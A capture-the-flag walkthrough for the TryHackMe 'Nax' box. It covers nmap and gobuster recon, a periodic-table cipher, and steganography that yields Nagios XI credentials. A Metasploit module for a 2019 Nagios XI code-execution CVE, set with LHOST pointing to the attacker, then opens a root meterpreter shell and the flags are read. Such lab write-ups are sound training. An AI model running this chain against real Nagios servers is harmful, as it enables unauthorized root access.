Nax is a medium difficulty box on TryHackMe. Below is a step by step walkthrough to root this box.
Let’s start by running nmap -A [machine ip]. We end up with the following results.
It looks like there’s sites running both on http and https, let’s take a look at both of them to see what’s going on. Both sites show the same page as shown below.
However, a review of the source code reveals a comment with a possible subdirectory to look at.
Let’s visit http://[machine ip]/nagiosxi. This leads to a login page for Nagios XI.
At this point, we do not have any credentials, so let’s use gobuster to try to enumerate and try to find some files/other directories. Let’s run gobuster dir -u http://[machine ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,xls -t 50. Unfortunately, this did not turn up anything. At this point I turned my attention back to the list of elements on the main page.
After a quick Google search, I found a Periodic Table Cipher. Converting the periodic elements (Ag - Hg - Ta - Sb - Po - Pd - Hg - Pt - Lr) to their respective element numbers gives us **47 80 73 51 84 46 80 78 103 **.
Next, let’s convert these numbers to their respective entries on an ASCII table. I used RapidTables for this. This gets us the answer to Question 1.
Visiting the answer to Question 1 gets us an image that I saved and downloaded.
Running exiftool [image name] (redacted due to it answering Question 1) gives us the answer to Question 2.
At this point, it seemed pretty obvious that this was using some sort of steganography, but I wasn’t sure what type was being used to be honest. I searched for the answer to Question 2 in Google followed by the word cryptography, which led me to a Reddit thread which had a link to an online decoder. I imported the picture and it was able to find a payload hidden within the image.
This ends up providing you with the Nagios credentials, which end up being the answers to Question 3 and Question 4. At this point, I went and attempted to use these newfound credentials to login to Nagios at http://[machine ip]/nagiosxi/ I was able to login successfully.
The next question asked for the CVE number, so I Googled CVE Nagios XI 5.5.6. There were several vulnerabilities out there, but the CVE ended up being one from 2019 that allows code execution as root. This is the answer to Question 5.
Question 6 has no answer to submit, as it wants you to start MetaSploit, so go ahead and do so.
Question 7 asks you for the module name of the machine, using search Nagios 5.5.6 once logged into will provide you with some modules, one of which is the answer to this question.
Once you have select this module, use SET PASSWORD and set the appropriate password and SET LHOST [attacker ip address]. Once done, it should look similar to the following.
Once reviewed, type run to run the exploit. You should have a meterpreter shell within a few moments. Next, type shell to get a local shell and run whoami and you will see you are root.
I next ran ls /home to enumerate nonroot users to find the user flag. There is a user galand here. If we run ls /home/galand we will see the user.txt file. This can be read with cat /home/galand/user.txt, the answer to Question 8.
Next, let’s run cat /root/root.txt, which is the usual default location for root flags.
And we’re all done with this box.